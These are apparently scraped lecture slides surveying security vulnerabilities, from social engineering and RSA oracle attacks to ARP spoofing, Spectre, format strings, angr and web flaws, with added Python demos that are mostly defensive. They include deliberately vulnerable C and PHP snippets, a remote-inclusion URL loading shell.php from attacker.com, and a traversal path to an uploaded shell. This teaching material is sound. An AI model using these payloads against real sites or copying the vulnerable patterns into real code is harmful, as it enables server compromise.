Security Vulnerabilities 2
The devil is in the details
Security Vulnerabilities
Social Engineering
The Human Factor
“To gain some advantage through human manipulation”
Typically it’s to obtain confidential information
● Passwords
● Financial data
● Confidential company data
Other instances
● Steal money
● Install malware
Common Examples
Phishing: mass attacks to steal some information.
Spear Phishing: email is used to carry out targeted attacks.
Baiting: promising victims a reward.
Tailgating: relies on human trust to give the criminal physical access to a secure building or area.
The Security Questions
Believe it or not, it is not difficult to guess the “secret” questions of your online account
● What’s your first pet
● Where were you born
● What’s your high school mascot
● What is your mother’s maiden name
● Adding more questions is better, but not foolproof
Consequences
Authentication Based Attacks
Factors of Identification
Threats to “something you know”
● Password authentication
○ Phishing
○ Poor password management
○ Key logging
○ Other eavesdropping
● Password based attacks
○ Password cracking
Threats to “something you have”
● Very few
● Usually protected with a chip
○ However, RFID copying
● Magnetic copying
Threats to “something you are”
● Some say the industry just isn’t there yet
● Many “facial recognition” systems are fooled with a print-out of your face
● False positives and false negatives
Crypto (in-)securities
Side Channel Attacks
● We can try to attack the mathematical foundation of a cryptosystem
● If that doesn’t work, we can try to attack the implementation
A parity problem
● We only want to sell an even number of eggs
● We want to use RSA to protect the orders (very sensitive information)
Figure (placeholder): the message space 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 drawn on a number line, with n = 15 (p = 3, q = 5)
The shop's answers to the submitted ciphertexts:
enc(m) → ok
enc(2·m) → ok
Adaptive Ciphertext Attack
enc(4·m) → err
enc(8·m) → ok
How can we change the message?
Multiplicative Property of RSA
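The parity problem above, worked through as an added example (not code from the slides): textbook RSA with the slide's n = 15, a hypothetical egg shop that answers only ok or err, and the interval-halving recovery that the multiplicative property enc(2·m) = enc(2)·enc(m) mod n makes possible. The recovery is written for any odd modulus, not just n = 15; the lesson for the defender is that a single leaked bit per chosen ciphertext is enough, so an unpadded RSA decryption must never be exposed to such a yes/no answer.

```python
from fractions import Fraction
from math import ceil, gcd


def rsa_keypair(p, q, e=3):
    """Textbook RSA from two primes (toy parameters; the slide uses p = 3, q = 5)."""
    n, phi = p * q, (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    return n, e, pow(e, -1, phi)  # modular inverse: needs Python 3.8+


def encrypt(m, n, e):
    return pow(m, e, n)


def decrypt(c, n, d):
    return pow(c, d, n)


class EggShop:
    """Hypothetical server from the slide: it decrypts an order, accepts it only
    if the number of eggs is even, and answers 'ok' or 'err' and nothing else."""

    def __init__(self, n, d):
        self.n, self.d = n, d
        self.queries = 0

    def place_order(self, c):
        self.queries += 1
        return "ok" if decrypt(c, self.n, self.d) % 2 == 0 else "err"


def recover_order(c, n, e, shop):
    """Recover m from c = enc(m) using only the shop's ok/err answers.

    Multiplicative property: enc(2^i * m) = enc(2)^i * enc(m) mod n, so the
    submitted 'doubled' orders are computed without knowing m.  Because n is
    odd, 2*r mod n is even exactly when 2*r did not wrap past n, so every
    answer halves the interval [lo, hi) that must contain m.
    """
    lo, hi = Fraction(0), Fraction(n)
    two_e = encrypt(2, n, e)
    for _ in range(n.bit_length()):  # ceil(log2 n) doublings narrow the width below 1
        c = (c * two_e) % n
        mid = (lo + hi) / 2
        if shop.place_order(c) == "ok":  # even: no wrap, m lies in the lower half
            hi = mid
        else:  # odd: wrapped past n, m lies in the upper half
            lo = mid
    return ceil(lo)  # the only integer left in [lo, hi)


def demo(p=3, q=5, e=3, m=2):
    """Encrypt an order of m eggs, recover it through the oracle, report the query count."""
    n, e, d = rsa_keypair(p, q, e)
    shop = EggShop(n, d)
    c = encrypt(m, n, e)
    return recover_order(c, n, e, shop), shop.queries


if __name__ == "__main__":
    print(demo())            # (2, 4): recovered with four ok/err answers
    print(demo(61, 53, 17, 65))  # larger toy modulus n = 3233: twelve answers
```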
Can we only hack farms?
PKCS#1 v1.5
0002 RANDOM PAD 00 MESSAGE
Broken by Bleichenbacher Attack (1998)
Electronic Codebook
Figure (placeholder): ECB vs CBC
Cipher Block Chaining
Padding Oracle Attack
https://www.infobytesec.com/down/paddingoracle_openjam.pdf
Timing Attack
“Never ever implement your own cryptosystem”
(Dan Boneh)
Network Security
Network Sniffing
● Technique at the basis of many attacks
● The attacker sets his/her network interface in promiscuous mode
● Many protocols (FTP, POP, HTTP, IMAP) transfer information in the clear
● Tools to collect, analyze, and replay traffic
● Routinely used for traffic analysis and troubleshooting
● Command-line tools:
○ tcpdump: collects traffic
○ tcpflow: reassembles TCP flows
○ tcpreplay: re-sends recorded traffic
● GUI tools:
○ Wireshark
■ Provides parsers for many protocols
Giovanni Vigna - youtu.be/NNDm8lRCb20
Network Sniffing
Spoofing
ARP spoofing
● The attacker sends forged ARP replies to pass himself off as the other party
● Sniff all traffic between two hosts (man-in-the-middle)
● Tools:
○ Dsniff
○ Ettercap
IP Spoofing
● Forge a packet with the source IP address spoofed
Giovanni Vigna - youtu.be/NNDm8lRCb20
Man In The Middle Attack
There is nothing here... sorry. But if you reached here, send an email to [email protected]
Man In The Middle Attack
Switched Environments
● Switched Ethernet does not allow direct sniffing
● MAC flooding
○ The switch keeps a table of MAC address / port mappings
○ In some cases, flooding the switch with bogus MAC addresses will overflow the table’s memory and make the switch revert to hub behaviour
● MAC duplicating / cloning
○ The attacker configures her host to have the same MAC address
○ The traffic is duplicated
Giovanni Vigna - youtu.be/NNDm8lRCb20
Defenses
● Static ARP entries
● Ignore unsolicited ARP replies
● Monitor changes (arpwatch)
● Firewalls
● HTTPS
Giovanni Vigna - youtu.be/NNDm8lRCb20
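An added example (not from the slides) of the arpwatch-style monitoring listed under Defenses: a small pure-Python parser for Ethernet/ARP frames and a watcher that flags unsolicited replies and changed IP-to-MAC bindings. The frames, MAC addresses and IP addresses below are constructed for the demo, not captured traffic.

```python
import struct
from ipaddress import IPv4Address

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2

# Constructed addresses for the demo (hypothetical hosts).
GATEWAY_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("0a0b0c0d0e0f")
ATTACKER_MAC = bytes.fromhex("deadbeef0001")


def mac_str(mac):
    return ":".join(f"{b:02x}" for b in mac)


def build_arp_frame(op, sender_mac, sender_ip, target_mac, target_ip):
    """Build a raw Ethernet + ARP frame (constructed test data)."""
    eth_dst = b"\xff" * 6 if op == ARP_REQUEST else target_mac
    eth = eth_dst + sender_mac + struct.pack("!H", ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)  # Ethernet/IPv4, 6-byte MAC, 4-byte IP
    arp += sender_mac + IPv4Address(sender_ip).packed
    arp += target_mac + IPv4Address(target_ip).packed
    return eth + arp


def parse_arp(frame):
    """Return (op, sender_mac, sender_ip, target_mac, target_ip), or None if not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    sha, spa = frame[22:28], str(IPv4Address(frame[28:32]))
    tha, tpa = frame[32:38], str(IPv4Address(frame[38:42]))
    return op, sha, spa, tha, tpa


class ArpWatcher:
    """Passive monitor: learns IP -> MAC from replies and raises alerts on the
    two symptoms of ARP spoofing named on the slides: replies nobody asked for,
    and an IP address that suddenly answers from a different MAC."""

    def __init__(self):
        self.table = {}      # ip -> mac learned from replies
        self.pending = set()  # ips with an outstanding request
        self.alerts = []

    def observe(self, frame):
        parsed = parse_arp(frame)
        if parsed is None:
            return
        op, sha, spa, tha, tpa = parsed
        if op == ARP_REQUEST:
            self.pending.add(tpa)
            return
        if op != ARP_REPLY:
            return
        if spa in self.pending:
            self.pending.discard(spa)
        else:
            self.alerts.append(f"unsolicited reply: {spa} is-at {mac_str(sha)}")
        known = self.table.get(spa)
        if known is not None and known != sha:
            self.alerts.append(
                f"changed ethernet address: {spa} {mac_str(known)} -> {mac_str(sha)}")
        self.table[spa] = sha


def demo_capture():
    """Constructed capture: a legitimate request/reply for the gateway, a non-ARP
    frame that must be ignored, then a forged reply claiming the gateway's IP."""
    return [
        build_arp_frame(ARP_REQUEST, CLIENT_MAC, "10.0.0.7", b"\x00" * 6, "10.0.0.1"),
        build_arp_frame(ARP_REPLY, GATEWAY_MAC, "10.0.0.1", CLIENT_MAC, "10.0.0.7"),
        b"\x00" * 12 + b"\x08\x00" + b"\x00" * 40,  # IPv4 ethertype, not ARP
        build_arp_frame(ARP_REPLY, ATTACKER_MAC, "10.0.0.1", CLIENT_MAC, "10.0.0.7"),
    ]


def run_demo():
    watcher = ArpWatcher()
    for frame in demo_capture():
        watcher.observe(frame)
    return watcher.alerts


if __name__ == "__main__":
    for alert in run_demo():
        print(alert)
```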
Network Protocols Vulnerabilities
SMURF (amplification attack)
Broadcast ping with spoofed source
Giovanni Vigna - youtu.be/NNDm8lRCb20
Networking Libraries and Tools
Libpcap
● Sniff traffic
Libnet
● Forge and inject traffic
Scapy
● Python library to do everything
Nmap
Giovanni Vigna - youtu.be/NNDm8lRCb20
Heartbleed (CVE-2014-0160)
https://xkcd.com/1354
Hardware Vulnerabilities
Rowhammer
RAM is made of rows of cells that are periodically refreshed.
When the CPU requests a read/write operation on a byte of memory, the data is first transferred to the row-buffer (discharging).
After performing the requested operation, the content of the row-buffer is copied back to the original row (recharging).
Frequent row activation (discharging and recharging) can cause bit-flips in adjacent memory rows.
https://thisissecurity.stormshield.com/2017/10/19/attacking-co-hosted-vm-hacker-hammer-two-memory-modules/
Rowhammer (+ Android = Drammer)
● VUSec (Amsterdam) showed that it is possible to deterministically decide where to put a kernel page using Android APIs
● Then it is possible to perform a bit-flip to get write access to a kernel page (and gain root)
https://www.vusec.net/projects/drammer/
Rowhammer (+ cloud + deduplication = oh no..)
1. Hammer the memory from attacker VM to find a bit-flipping row.
2. Load target file in memory page vulnerable to a bit-flip.
3. Load target file in the victim VM.
4. Wait for KSM to merge the two pages.
5. Hammer again.
6. The file in the victim VM should have been modified.
https://thisissecurity.stormshield.com/2017/10/19/attacking-co-hosted-vm-hacker-hammer-two-memory-modules/
Spectre (CVE-2017-5753 and CVE-2017-5715)
Speculative Execution
Speculative execution is an optimization technique where a computer system performs some task that may not be needed.
Work is done before it is known whether it is actually needed, so as to prevent a delay that would have to be incurred by doing the work after it is known that it is needed.
Cache Side Channel
● The attacker has control over what is cached (by evicting entries from the cache)
● By measuring the time to access a piece of data, it is possible to determine if the data was in cache or not.
● What if we are able to cache something we should not have access to?
https://spectreattack.com/spectre.pdf
How does Spectre work
if (x < array1_size) { y = array2[array1[x] * 4096]; }
● The attacker controls x.
● array1_size is not cached.
● array1 is cached.
● The CPU guesses that x is less than array1_size.
Figure (placeholder): array1 holding the values 3 8 1, used to index into array2
https://spectreattack.com/spectre.pdf
How does Spectre work
if (x < array1_size) { y = array2[array1[x] * 4096]; }
● The CPU executes the body of the if statement while it is waiting for array1_size to load.
● The attacker can then determine the actual value of array1[x] by timing which entry of array2 was brought into the cache.
Figure (placeholder): array1 holding the values 3 8 1, used to index into array2
https://spectreattack.com/spectre.pdf
Application Vulnerabilities
Design Vulnerabilities
● Intrinsic in the overall logic of the application
○ Lack of authentication and/or authorization checks
○ Erroneous trust assumptions
● These vulnerabilities are the most difficult to identify automatically because they require a clear understanding of the functionality implemented by the application
● (An automatic exploit tool should automatically understand what the application does - halting problem)
Giovanni Vigna - youtu.be/NNDm8lRCb20
Implementation Vulnerabilities
These vulnerabilities are introduced because the application is not able to correctly handle unexpected events
● Unexpected input
● Errors/exceptions
● Unfiltered output
Giovanni Vigna - youtu.be/NNDm8lRCb20
Local Attacks vs Remote Attacks
Local attacks
● Allow one to manipulate the behavior of the application through local interaction
○ Requires a previously established presence on the host
● Allow one to execute operations with privileges that are different from the ones the attacker would have
● In general, easier to perform, because we already have access to the machine
Remote attacks
● Allow one to manipulate an application through network-based interaction
● Allow one to execute operations with the privilege of the vulnerable application
● In general, more difficult to carry out because we do not already have a user on the machine
Giovanni Vigna - youtu.be/NNDm8lRCb20
![Page 77: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/77.jpg)
How to make an application misbehave
We want to manipulate the instruction pointer (program counter, IP) to point to code that we want.
How?
● Buffer overflow
● Format string exception
● PLT and GOT (dynamically linked libraries)
● … many others (use-after-free, dirty cow, …)
Buffer Overflow
https://security.stackexchange.com/questions/135786
Buffer Overflow Defenses (Stack Canaries)
http://www.cbi.umn.edu/securitywiki/CBI_ComputerSecurity/MechanismCanary.html
Format String Exception

```c
#include <stdio.h>

int main(int argc, char* argv[]) {
    if (argc < 2) {
        printf("Enter the command Argument\n");
    } else {
        printf(argv[1]);   /* user-controlled data is used as the format string */
    }
    return 0;
}
```
What can possibly go wrong?
https://resources.infosecinstitute.com/format-string-bug-exploration/
PLT and GOT
● When a shared library function is called by a program, the address called is an entry in the Procedure Linkage Table (PLT)
● That entry contains an indirect jump to the address stored in a variable in the Global Offset Table (GOT)
● The first time a function is called, the GOT entry points to code that invokes the dynamic linker
● The linker resolves the symbol and updates the GOT entry, so the next time the function is called it is invoked directly
● Note that the PLT is read-only, but the GOT is not
○ Note: the GOT can be made read-only using the RELRO hardening compilation option (full RELRO, which also disables lazy binding so every entry is resolved at load time; partial RELRO alone leaves the lazily-resolved entries writable)
Ok, we can control the Instruction Pointer. Now what?
● Return to Stack (Ret2Stack)
○ We can write instructions in a buffer on the stack and then point the IP there
○ Defense: non-executable stack
● Return to C Library (Ret2Libc)
○ Libc is already executable, and it’s somewhere
○ Libc might contain pieces that should not be invoked (like spawning a shell)
○ Defense: Address Space Layout Randomization (ASLR)
● Return Oriented Programming (ROP)
○ We can identify parts of code in libraries (already executable) that are not even complete functions, just a few assembly instructions terminated by a return (gadget)
○ By chaining these gadgets we can execute what we want
○ Defense: Control-Flow Integrity
Binary Analysis Techniques
● Static Analysis
● Dynamic Analysis
● Fuzzing
● Symbolic Analysis
Static Analysis
● Static analysis is a technique to analyze programs that does not involve executing the program
● Control-flow analysis
○ Analyzes how the program execution is transferred across the program components
■ Control-flow graph
● Data-flow analysis
○ Analyzes what data values can be assumed by specific data stores (e.g., variables) at various points in the program
Dynamic Analysis
● Dynamic analysis is a technique that analyzes a program by observing its execution
● The advantage of dynamic analysis is that concrete execution provides an instance of which input brought the program into a certain state, even when the code itself only exists at run time:
○ M1 = decrypt(M)
○ addr = load(M1)
○ jump addr
● The disadvantage of dynamic analysis is that one can only prove properties about the code that has actually been executed
Static Analysis
● objdump
● IDA
Dynamic Analysis
● gdb (& friends)
● radare2
Limitations
Fuzzing
Symbolic Analysis to the rescue!
https://angr.io
(Figure: symbolic exploration graph with a start node, an end node and two avoid nodes)
angr: https://angr.io
What is angr?
● Binary analysis framework written in Python combining both static and symbolic dynamic analysis (“concolic analysis”, from concrete and symbolic)
● Developed by UCSB (third place in the DARPA Cyber Grand Challenge)
● Based on VEX (Valgrind), so it can be used on many architectures
● Analysis flow:
○ The executable is loaded in the framework
○ The assembly code is lifted to an intermediate representation
○ The analysis is performed
How to use it?
ais3 crackme
● https://github.com/angr/angr-doc/tree/master/examples/ais3_crackme
● We execute the binary with an argument
● If the argument is correct
○ stdout: “Correct! that is the secret key!”
● Else
○ stdout: “I’m sorry, that’s the wrong secret key!”
Target
```python
import angr, claripy

project = angr.Project("./ais3_crackme")

# create an initial state with a symbolic bit vector as argv1
argv1 = claripy.BVS("argv1", 100*8)  # 100 bytes
initial_state = project.factory.entry_state(args=["./ais3_crackme", argv1])

# create a simulation manager (formerly "path group") from the initial state
sm = project.factory.simulation_manager(initial_state)

# symbolically execute the program until we reach the wanted value of the IP
sm.explore(find=0x400602)  # find a way to reach the address
found = sm.found[0]

# ask the symbolic solver for the value of argv1 in the reached state, as bytes
solution = found.solver.eval(argv1, cast_to=bytes)
print(repr(solution))
```
![Page 120: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/120.jpg)
$ python3 solve.py
ais3{I_tak3_g00d_n0t3s}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
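To make the explore(find=…, avoid=…) / solver.eval() loop concrete without angr or the crackme binary, here is an added toy symbolic executor (not angr code): it runs a constructed byte-by-byte key check, forks a state at every branch, keeps a path condition per state, prunes unsatisfiable paths, and asks the toy solver for an input that reaches the "correct" exit. The key, mask and instruction set are all constructed for this example.

```python
from collections import deque
from dataclasses import dataclass

# Constructed toy "binary": instructions over a fixed-length input buffer.
#   ('CMP_JNE', i, mask, const, target): if (input[i] ^ mask) != const: goto target
#   ('JMP', target)
#   ('EXIT', label)
KEY = b"key{t0y}"   # constructed secret, not the ais3 flag
MASK = 0x5A         # the check compares obfuscated bytes, as crackmes often do


def build_crackme(key):
    """Return (program, win_pc, fail_pc) for a byte-by-byte key check."""
    fail, win = len(key) + 1, len(key) + 2
    program = [("CMP_JNE", i, MASK, k ^ MASK, fail) for i, k in enumerate(key)]
    program += [("JMP", win), ("EXIT", "wrong"), ("EXIT", "correct")]
    return program, win, fail


@dataclass(frozen=True)
class Constraint:
    index: int    # which input byte
    mask: int     # XOR mask applied before the comparison
    const: int    # value compared against
    equal: bool   # True: (input[index] ^ mask) == const, False: !=


@dataclass(frozen=True)
class State:
    pc: int
    constraints: tuple  # path condition, the toy version of angr's solver constraints


def solve(constraints, length):
    """Concrete input satisfying the path condition, or None if unsat (toy solver.eval)."""
    fixed, excluded = {}, {}
    for c in constraints:
        v = (c.const ^ c.mask) & 0xFF            # undo the XOR to get the plain byte
        if c.equal:
            if fixed.setdefault(c.index, v) != v:
                return None                      # two different values demanded for one byte
        else:
            excluded.setdefault(c.index, set()).add(v)
    model = bytearray(length)
    for i in range(length):
        banned = excluded.get(i, set())
        if i in fixed:
            if fixed[i] in banned:
                return None
            model[i] = fixed[i]
        else:   # unconstrained byte: any allowed value is a valid model
            model[i] = next(v for v in range(256) if v not in banned)
    return bytes(model)


def explore(program, length, find, avoid):
    """BFS over symbolic states, forking at every branch (toy sm.explore(find, avoid))."""
    queue, seen, stepped = deque([State(0, ())]), set(), 0
    while queue:
        st = queue.popleft()
        if st.pc == find:
            return st, stepped
        if st.pc in avoid or st in seen:
            continue                             # 'avoid' states are simply discarded
        seen.add(st)
        stepped += 1
        ins = program[st.pc]
        if ins[0] == "CMP_JNE":
            _, i, mask, const, target = ins
            taken = State(target, st.constraints + (Constraint(i, mask, const, False),))
            fall = State(st.pc + 1, st.constraints + (Constraint(i, mask, const, True),))
            for nxt in (taken, fall):
                if solve(nxt.constraints, length) is not None:   # prune unsat paths
                    queue.append(nxt)
        elif ins[0] == "JMP":
            queue.append(State(ins[1], st.constraints))
        # EXIT: terminal, nothing to schedule
    return None, stepped


def run_concrete(program, data):
    """Execute the toy binary on a concrete input and return its exit label."""
    pc = 0
    while True:
        ins = program[pc]
        if ins[0] == "CMP_JNE":
            _, i, mask, const, target = ins
            pc = target if (data[i] ^ mask) != const else pc + 1
        elif ins[0] == "JMP":
            pc = ins[1]
        else:
            return ins[1]


def recover_key(key=KEY):
    """Find an input reaching the 'correct' exit while never touching the 'wrong' one."""
    program, win, fail = build_crackme(key)
    found, _ = explore(program, len(key), find=win, avoid={fail})
    return None if found is None else solve(found.constraints, len(key))


if __name__ == "__main__":
    secret = recover_key()
    print(repr(secret))
    print(run_concrete(build_crackme(KEY)[0], secret))
```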
![Page 121: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/121.jpg)
angr references
● angr: https://github.com/angr
● angr-doc: https://github.com/angr/angr-doc
● angr-course: https://github.com/angr/acsac-course
● z3: https://github.com/mwrlabs/z3_and_angr_binary_analysis_workshop
● Triton and symbolic execution on GDB (DEF CON China): https://www.slideshare.net/bananaappletw/triton-and-symbolic-execution-on-gdbdef-con-china-97054877
![Page 122: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/122.jpg)
Web Security
Cross Site Scripting (XSS)
Defenses:
● Application Filters (htmlentities)
● HTML Purifiers
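The two defenses named above, as an added example (not from the slides): an application filter that encodes HTML metacharacters the way PHP's htmlentities does, shown next to the unfiltered rendering, plus a tiny allowlist purifier that illustrates the idea behind HTML Purifier (not its code). The comment text is constructed.

```python
import html
from html.parser import HTMLParser

# Constructed untrusted input, as a comment field might deliver it
COMMENT = '<b>great post</b><script>alert(1)</script><img src=x onerror=alert(1)>'


def render_comment_unsafe(comment: str) -> str:
    """Reflects the input verbatim into the page: this is the XSS bug."""
    return f'<p class="comment">{comment}</p>'


def render_comment(comment: str) -> str:
    """Application filter: encode the HTML metacharacters (what htmlentities does).
    The browser then displays the text and never parses it as markup."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def render_attribute(value: str) -> str:
    """Same filter inside an attribute: quote=True is what stops the value from
    closing the quote and starting a new attribute (an event handler, say)."""
    return f'<a title="{html.escape(value, quote=True)}">link</a>'


ALLOWED = {"b", "i", "em", "strong"}   # formatting tags users may keep


class Purifier(HTMLParser):
    """Allowlist purifier: keeps a few formatting tags with no attributes,
    escapes all text, and drops every other tag."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.open = [], []

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED:                 # attributes are dropped even on allowed tags
            self.out.append(f"<{tag}>")
            self.open.append(tag)
        # script, img, iframe, ... simply vanish

    def handle_endtag(self, tag):
        if tag in self.open:
            while self.open:               # close inner tags first; output stays well formed
                top = self.open.pop()
                self.out.append(f"</{top}>")
                if top == tag:
                    break

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=True))

    def result(self) -> str:
        self.close()                       # flush buffered text
        while self.open:                   # close anything the input left open
            self.out.append(f"</{self.open.pop()}>")
        return "".join(self.out)


def purify(fragment: str) -> str:
    p = Purifier()
    p.feed(fragment)
    return p.result()
```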
SQL Injection (SQLi)
● A database is a structured collection of data that is accessed by one or more applications
● Databases typically contain information that is critical to the business
SQL Injection
● The goal is to extract information from the database (but it can also modify / delete data)
● One of the most common types of attack
● Exploited by sending unexpected input to insecure web applications
SQL Injection Defenses (Prepared Statements)
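An added example (not from the slides) of the defense named above, using Python's sqlite3 on a constructed in-memory users table: a login query built by string concatenation next to the same query as a prepared statement, so the "unexpected input" from the previous slide can be seen changing the SQL in one case and staying plain data in the other.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table (rows are made up for the example)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "correct-horse"), ("bob", "battery-staple")])
    return db


def login_vulnerable(db, username: str, password: str) -> list:
    """Builds the query by string concatenation: the input becomes part of the SQL,
    so a quote character in it ends the literal and the rest is parsed as code."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return sorted(row[0] for row in db.execute(sql))


def login_prepared(db, username: str, password: str) -> list:
    """Prepared statement: the SQL text is fixed, the values are bound as parameters,
    so whatever the input contains it is only ever compared as data."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return sorted(row[0] for row in db.execute(sql, (username, password)))
```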
![Page 129: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/129.jpg)
Remote File Inclusion (RFI)
Remote File Inclusion (RFI) is a type of vulnerability that allows an attacker to include a remotely hosted file, usually through a script on the web server.
https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion
http://victim.com/index.php?page=home
index.php

```php
$page = $_REQUEST["page"];
include($page.".php");
```

http://victim.com/index.php?page=http://attacker.com/shell.php
![Page 130: Social Engineering · Tools to collect, analyze, and reply traffic Routinely used for traffic analysis and troubleshooting Command line-tools: tcpdump: collects traffic tcpflow: reassembles](https://reader034.vdocuments.us/reader034/viewer/2022042304/5ecfc9eb362c2c359a71ce69/html5/thumbnails/130.jpg)
Local File Inclusion (LFI)
Local File Inclusion (LFI) is the process of including files that are already on the server, by exploiting vulnerable inclusion procedures.
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
http://victim.com/index.php?page=home
index.php

```php
$page = $_REQUEST["page"];
include("pages/".$page.".php");
```

http://victim.com/index.php?page=../../avatars/shell.php
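An added example (not from the slides) covering both the RFI and the LFI slide: the include("pages/".$page.".php") lookup written in Python, unvalidated next to a hardened version that allowlists the page name and confirms the resolved path stays under pages/, plus a small classifier for logging what a page parameter tried to do. The site layout is constructed in a temporary directory, and one ../ is enough there because the layout is shallower than the one behind the slide's ../../.

```python
import re
import tempfile
from pathlib import Path
from typing import Optional
from urllib.parse import urlparse

PAGE_NAME = re.compile(r"[a-z0-9_]{1,32}")   # allowlist for the page parameter


def make_site(root: Path) -> None:
    """Constructed layout: pages/home.php next to a user-writable avatars/ directory."""
    (root / "pages").mkdir()
    (root / "pages" / "home.php").write_text("<h1>home</h1>")
    (root / "avatars").mkdir()
    (root / "avatars" / "shell.php").write_text("<?php /* uploaded by a user */ ?>")


def resolve_page_unsafe(root: Path, page: str) -> Optional[Path]:
    """include("pages/".$page.".php") in Python terms: no validation at all.
    (Pulling a remote URL through include additionally needs PHP's allow_url_include.)"""
    candidate = root / "pages" / (page + ".php")
    return candidate if candidate.is_file() else None


def resolve_page(root: Path, page: str) -> Optional[Path]:
    """Hardened lookup: allowlist the name, then confirm the resolved path is under pages/."""
    if not PAGE_NAME.fullmatch(page):
        return None                            # no '/', '.', ':' => no ../ and no http://
    base = (root / "pages").resolve()
    candidate = (base / f"{page}.php").resolve()
    if base not in candidate.parents:          # second line of defence (symlinks, odd names)
        return None
    return candidate if candidate.is_file() else None


def classify(page: str) -> str:
    """Label what a page parameter tries to do; useful for logging and alerting."""
    if urlparse(page).scheme in ("http", "https", "ftp"):
        return "remote"
    parts = page.replace("\\", "/").split("/")
    if ".." in parts or page.startswith("/"):
        return "traversal"
    return "plain"


def demo() -> dict:
    """Run both resolvers against the kinds of input from the slides, in a temp site."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        make_site(root)
        inputs = {"home": "home", "traversal": "../avatars/shell",
                  "remote": "http://attacker.com/shell"}
        return {
            f"{how}_{name}": resolver(root, value) is not None
            for how, resolver in (("unsafe", resolve_page_unsafe), ("safe", resolve_page))
            for name, value in inputs.items()
        }
```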
Cross Site Request Forgery (CSRF)
CSRF Tokens
IoT Vulnerabilities
The “S” in “IoT” stands for Security.
Misconfiguration / Insecure firmware
1. Weak, guessable, or hard-coded passwords.
2. Insecure network services.
3. Lack of secure update mechanisms.
4. Use of insecure or outdated components.
5. Insecure data transfer and storage.
Shodan.io
Shodan is a search engine that lets the user find specific types of computers (webcams, routers, servers, etc.) connected to the internet using a variety of filters.
Mirai Botnet
Mirai (Japanese: 未来, lit. 'future') is a malware that turns networked devices into remotely controlled bots that can be used as part of a botnet in large scale network attacks.
2016: Dyn DNS outage
Machine Learning Security
“Adversarial Machine Learning is a novel research area that lies at the intersection of machine learning and computer security.”
Adversarial Machine Learning
Adversarial ML - Physical Attacks
Image taken from https://www.cs.cmu.edu/~sbhagava/papers/face-rec-ccs16.pdf
Adversarial ML - Physical Attacks
Image taken from https://arxiv.org/pdf/1712.09665.pdf
The Vulnerability Market
Zero-Day
A zero-day (also known as 0-day) vulnerability is a computer-software vulnerability that is unknown to, or unaddressed by, those who should be interested in mitigating the vulnerability.
Big vendors are so interested in keeping their software secure that they have dedicated teams to find security vulnerabilities in other software.
Project Zero
Exploits can be sold
ZERODIUM: exploit acquisition platform for zero-days.
ZERODIUM customers are government organizations (mostly from Europe and North America) in need of advanced zero-day exploits.
Mobile exploits are paid more
Mobile devices now hold very valuable information and thus mobile exploits are much more valuable (with Android being the most valued).
Cyber-Weapons: The Stuxnet Case
THANK YOU